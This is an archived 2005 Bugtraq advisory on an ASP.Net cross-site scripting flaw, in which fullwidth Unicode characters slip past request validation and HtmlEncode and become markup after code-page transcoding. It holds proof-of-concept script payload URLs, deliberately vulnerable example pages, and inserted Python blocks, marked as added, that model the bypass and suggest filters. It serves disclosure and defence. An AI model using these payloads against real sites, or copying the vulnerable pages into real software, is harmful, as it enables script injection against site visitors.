Bugtraq mailing list archives

XSS vulnerability in ASP.Net [with details]


From: Andir Andir <spam_andir () mail ru>
Date: Thu, 17 Feb 2005 04:33:40 +0300

In August 2004 I found an XSS vulnerability in Microsoft ASP.Net, and now I am publishing
it.

Full details:
En: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml
Ru: http://it-project.ru/andir/docs/aspxvuln/aspxvuln.ru.xml

P.S. I present my apologies for my bad English :( My native language is
Russian.

With best regards, Andir!

From David Ahmad <da () securityfocus com>: 
Please include the full details in your message. Thank you!

Details from http://it-project.ru/andir/docs/aspxvuln/aspxvuln.en.xml:

---------------------------------------------------------------------------------
XSS vulnerability in ASP.Net

Andrey Rusyaev, post-graduate student, Security Chair, FESU (Far Eastern State University), Vladivostok, Russia, 
andir[SPAM-PROTECT]@it-project.ru.

February 9, 2005, updated February 14, 2005

Abstract

Under specific conditions, a cross-site scripting (XSS) attack [1] is possible against a web site running on ASP.Net, 
because special HTML characters are filtered incorrectly. The attack exploits the mechanism that converts Unicode 
strings [2] to national ASCII code pages. The basic problem is the lack of filtering of special HTML characters in the 
range U+ff00-U+ff60 (fullwidth ASCII characters [3]).

Introduction

The problem was discovered in August 2004. All versions of the .Net Framework that exist at the time of writing are affected:

    * .Net Framework, version 1.0
    * .Net Framework, version 1.0 + service pack 1
    * .Net Framework, version 1.0 + service pack 2
    * .Net Framework, version 1.1
    * .Net Framework, version 1.1 + service pack 1
    * .Net Framework, version 1.1 + service pack 1 + Security Bulletin MS05-004 from February 8, 2005

After some testing, a similar problem was discovered in the free implementation of the .Net Framework by the Mono 
Project [4]. The following versions are affected:

    * Mono, version 1.0.5.

Note: Other versions have not been tested.

Background

The .Net Framework handles strings only as Unicode. Conversion from/to a national ASCII code page is possible on 
input/output respectively. In particular, ASP.Net can output the HTML text of a web page in a national ASCII code page 
(such as 'windows-1251', 'koi8-r', and others). Under these conditions, Unicode characters from the range U+ff00-U+ff60 
(fullwidth ASCII characters) are converted to the corresponding ordinary ASCII characters. Among the fullwidth ASCII 
characters are several HTML-special characters (such as '<', '>' and others), which can be used to inject malicious 
HTML, malicious script (via the <script> HTML tag), or other variants (more details in [5]).

Vulnerability Details

It was discovered that ASP.Net does not filter special HTML characters (such as '>', '<' and others) out of Unicode 
strings when the output web page is written in one of the national ASCII code pages.

   1. Injection of special HTML characters into an ASP.Net web page using Unicode characters from the fullwidth ASCII 
characters range.

      Example:

      http://server.com/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

      Web page 'attack1.aspx' prints the HTTP request parameter 'test'.
      The web page looks like the following:

     <!-- Web page attack1.aspx -->
     <%@ Page Language="C#" %>
     <%
        Response.Write(Request.QueryString["test"]); // Attack through URL parameter: written unencoded
     %>

     The Web.config for server.com looks like the following:

     <configuration>
       <system.web>
         <globalization responseEncoding="windows-1251" />
       </system.web>
     </configuration>

   2. ASP.Net Request Validation bypass.

      The "Request Validation" mechanism, designed to protect against cross-site scripting and SQL injection, lets 
restricted tags through when they are written with characters from the fullwidth ASCII range U+ff00-U+ff60.

      Example:
      http://server.com/attack2.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

      Web page 'attack2.aspx' prints the HTTP request parameter 'test'.
      The web page looks like the following:

     <!-- Web page attack2.aspx -->
     <%@ Page Language="C#" ValidateRequest="true" %>
     <%
        Response.Write(Request.QueryString["test"]); // Attack through URL parameter: request validation sees no '<'
     %>

     The Web.config for server.com looks like the following:

     <configuration>
       <system.web>
         <globalization responseEncoding="windows-1251" />
       </system.web>
     </configuration>

     Note: the validateRequest attribute of an ASP.Net web page is available only in ASP.Net version 1.1 and later, 
and in Mono (no information about which versions) [6].
  
   3. HTML encoding methods bypass.
      Note: This attack does not apply to the Mono implementation of ASP.Net.

      HttpServerUtility.HtmlEncode has no filtering for Unicode characters in the range U+ff00-U+ff60.

      The methods for encoding special HTML characters therefore do not protect against the attacks in the previous 
examples. Encoding runs on the Unicode string before it is converted to the national ASCII code page for output, so the 
fullwidth characters pass through HtmlEncode untouched and are only folded to '<' and '>' afterwards, when the 
attacker's payload has already become the page's markup.

      Example:
      http://server.com/attack3.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e

      Web page 'attack3.aspx' prints:
         1. the HTTP request parameter 'test',
         2. a string with injected Unicode characters.

      The web page looks like the following:

     <!-- Web page attack3.aspx -->
     <%@ Page Language="C#" %>
     <%
        // 1) Attack through URL parameter: HtmlEncode runs before the response is transcoded
        Response.Write(Server.HtmlEncode(Request.QueryString["test"]));
        // 2) Attack through injected Unicode characters in a server-side string
        string code = Server.HtmlEncode("\uff1cscript\uff1ealert('vulnerability')\uff1c/script\uff1e");
        Response.Write(code);
     %>

     The Web.config for server.com looks like the following:

     <configuration>
       <system.web>
         <globalization responseEncoding="windows-1251" />
       </system.web>
     </configuration>
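To make the three cases above concrete, here is an added Python model (not code from the advisory, from ASP.Net or from Mono) of the same pipeline. The best-fit behaviour of the .Net code-page encoder is simulated with a custom codecs error handler that folds an unencodable character to its NFKC form when that form is plain ASCII; this simulation, the simplified request-validation rule and the payload string are assumptions, and `render()`, `attack1()`, `attack3()`, `safe_utf8()` and the other function names are chosen here. It shows that request validation and HtmlEncode both operate on the Unicode string and never see a '<', that the windows-1251 transcoding is what manufactures the markup, and that a Unicode responseEncoding leaves the fullwidth bytes harmless.

```python
import codecs
import html
import re
import unicodedata

# Constructed: the advisory's query parameter after %uXXXX decoding.
# U+FF1C and U+FF1E are the fullwidth forms of '<' and '>'.
PAYLOAD = "\uff1cscript\uff1ealert('vulnerability')\uff1c/script\uff1e"


def _best_fit(err: UnicodeError):
    """codecs error handler modelling a best-fit encoder fallback.

    Each character the target code page cannot represent is replaced by its
    compatibility (NFKC) form when that form is plain ASCII, otherwise by '?'.
    This approximates the behaviour the advisory attributes to the .Net
    code-page encoders (assumption); it is enough to show the mechanism.
    """
    if not isinstance(err, UnicodeEncodeError):
        raise err
    chunk = err.object[err.start:err.end]
    out = []
    for ch in chunk:
        folded = unicodedata.normalize("NFKC", ch)
        out.append(folded if folded.isascii() else "?")
    return "".join(out), err.end


codecs.register_error("bestfit", _best_fit)

# Simplified model of ASP.Net 1.1 request validation (assumption): reject a
# '<' followed by a letter, '!', '/' or '?', or an '&#', in the raw string.
_DANGEROUS = re.compile(r"<[A-Za-z!/?]|&#")


def request_validation_rejects(value: str) -> bool:
    """True when the (simplified) validator would throw for this input."""
    return _DANGEROUS.search(value) is not None


def render(value: str, response_encoding: str, html_encode: bool) -> bytes:
    """Model of Response.Write under a given <globalization responseEncoding>.

    html_encode=True models Server.HtmlEncode applied to the Unicode string
    *before* the response is transcoded, the order the advisory describes.
    """
    text = html.escape(value, quote=True) if html_encode else value
    return text.encode(response_encoding, errors="bestfit")


def attack1() -> bytes:
    """attack1.aspx: raw Response.Write, windows-1251 output."""
    return render(PAYLOAD, "cp1251", html_encode=False)


def attack3() -> bytes:
    """attack3.aspx: Server.HtmlEncode, then windows-1251 output."""
    return render(PAYLOAD, "cp1251", html_encode=True)


def safe_utf8() -> bytes:
    """The same page with responseEncoding="utf-8": nothing is folded."""
    return render(PAYLOAD, "utf-8", html_encode=True)


def strict_encoding_rejects() -> bool:
    """A strict (non-best-fit) encoder cannot emit the payload at all, which
    shows that the fallback, not the code page itself, is the root cause."""
    try:
        PAYLOAD.encode("cp1251")
    except UnicodeEncodeError:
        return True
    return False


if __name__ == "__main__":
    print("request validation rejects payload:", request_validation_rejects(PAYLOAD))
    print("attack1 :", attack1())
    print("attack3 :", attack3())
    print("utf-8   :", safe_utf8())
    print("strict cp1251 rejects payload:", strict_encoding_rejects())
```

Run it as a script to see the three response bodies side by side; the cp1251 ones contain a literal `<script>` tag even though the input never contained a '<'.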

Protection Methods

Several protection methods may be proposed:

    * Use only a Unicode encoding for the output of ASP.Net pages; for this purpose, use a web.config like the following:

    <configuration>
      <system.web>
        <globalization responseEncoding="utf-8" />
      </system.web>
    </configuration>

    * If you cannot use Unicode, you must filter fullwidth ASCII characters out of all untrusted data (user input, 
HTTP headers, the output of some components, and other data). Note that the fullwidth block is only the most obvious 
case: any other character that the target code page's best-fit table folds to '<', '>', '"', ''' or '&' has the same 
effect, so checking the data after it has been normalized (or transcoded) to the output character set is more 
reliable than a denylist of one Unicode block.
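The second protection method, generalized a little, as an added Python example (not the advisory's own code): the filter uses Unicode compatibility normalization (NFKC) to find every non-ASCII character that would fold to '<', '>', '"', ''' or '&', which covers the fullwidth block U+ff00-U+ff60 and other compatibility forms such as U+FE64 SMALL LESS-THAN SIGN. Treating NFKC as a stand-in for the target code page's best-fit table is an assumption, and `folding_chars`, `neutralize` and `safe_html_fragment` are names chosen here. `safe_html_fragment` shows the more robust order: canonicalize the untrusted string first, then HTML-encode it, so that a later transcoding has nothing left to fold into markup.

```python
import html
import unicodedata

# ASCII characters that matter in an HTML context (assumption: untrusted data
# lands in element content or a quoted attribute, not inside a script block).
HTML_SPECIAL = frozenset('<>"\'&')


def folding_chars(value: str) -> list:
    """Return [(index, char, folded)] for each non-ASCII character in value
    whose NFKC form contains an HTML-special ASCII character.

    NFKC is used as a conservative stand-in for the best-fit table of the
    response code page (assumption): it covers the fullwidth forms
    U+FF00-U+FF60 and other compatibility variants, but the real table for
    the target code page should be consulted as well.
    """
    hits = []
    for i, ch in enumerate(value):
        if ch.isascii():
            continue
        folded = unicodedata.normalize("NFKC", ch)
        if HTML_SPECIAL.intersection(folded):
            hits.append((i, ch, folded))
    return hits


def neutralize(value: str) -> str:
    """Remove every folding character found by folding_chars().

    Dropping characters is one policy; rejecting the whole request is the
    stricter alternative when the data is not expected to contain them.
    """
    bad = {i for i, _, _ in folding_chars(value)}
    return "".join(ch for i, ch in enumerate(value) if i not in bad)


def safe_html_fragment(value: str) -> str:
    """Canonicalize first, then encode.

    Normalizing to NFKC turns every compatibility form into its ASCII
    equivalent before html.escape() runs, so the escaped result contains no
    character that a later best-fit transcoding could fold into markup.
    Caveat: NFKC also changes legitimate text (ligatures, superscripts,
    fullwidth CJK punctuation), which may be unacceptable for some sites.
    """
    return html.escape(unicodedata.normalize("NFKC", value), quote=True)


if __name__ == "__main__":
    # Constructed payload: the advisory's URL parameter after %u-decoding.
    payload = "\uff1cscript\uff1ealert('vulnerability')\uff1c/script\uff1e"
    for i, ch, folded in folding_chars(payload):
        print(f"offset {i}: U+{ord(ch):04X} folds to {folded!r}")
    print("neutralized :", neutralize(payload))
    print("escaped     :", safe_html_fragment(payload))
```

`folding_chars` is the audit check (run it over query strings, headers and component output to see what would be folded); `safe_html_fragment` is the output-side fix, and it is safe whatever responseEncoding the page is finally served in.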

More Information

This vulnerability was reported to the Microsoft Security Response Center on August 2, 2004; the reply stated that 
case 5438 had been opened for it. Later, I received the following answer:

"We have decided that a KB article and update to tools and/or best practice guidelines should be done for this, and 
will be as time permits. We are not tracking this case as a security bulletin".

The vulnerability has no patch at the time of writing (February 9, 2005).

References

   1. CERT Advisory CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests, 
http://www.cert.org/advisories/CA-2000-02.html.
   2. Unicode Home Page, http://unicode.org/.
   3. Unicode.org, Halfwidth and Fullwidth Forms, http://www.unicode.org/charts/PDF/UFF00.pdf.
   4. Mono Project, http://mono-project.com/.
   5. CGISecurity.com, "The Cross Site Scripting FAQ.", May 2002, http://www.cgisecurity.com/articles/xss-faq.shtml.
   6. .Net Framework SDK, @Page directive, ValidateRequest attribute, 
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpgenref/html/cpconPage.asp.

